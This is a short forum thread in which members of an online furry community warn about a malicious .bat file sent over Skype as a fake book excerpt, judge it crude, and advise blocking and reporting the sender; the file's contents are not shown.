Some random guy called 'Rusty Wolf' added me on skype.

Tried to send me a snippet of Contrast's new book.

It was a .bat, so from being 10 years old and making funny .bat files I knew exactly what this was. But seeing as how I knew it couldn't auto-exec. I just disabled my AV and inspected the file. Turns out these were the contents:

So yeah, this is pretty a virus that attempts to ruin your windows files. So just know, some idiot is actually trying to fool people by doing this. Sad really.

Don't be fooled. This is the warning, and I want to find out who this 'Rusty Wolf' really is, and if he is actually on ZAFur. Just be on the look out for an idiot who thinks he is smart, and cool - oh and can 'hack'.

Thats not a virus, just a stupid half assed attempt at creating a batch to delete some system files ,I loled when I saw he actually does Autoexec.bat , any furries still running windows 95-98se?

Worst case scenario is you will have to do a windows re-install/restore to get your pc working again,most AV programs protect those files anyway, not to mention User Account control on newer OSes.

By the look of the script he is probably <12yo or some one who with very little knowledge of windows in general...

Don't troll people, that's just likely to cause more problems. Rather block him and report him. If he's using Skype to distribute harmful files that's probably against their TOS and they will be able to disable his account and perhaps even follow up. The name isn't familiar to me on the forum but maybe Valerion is able to search through profiles to see if the Skype name is around.
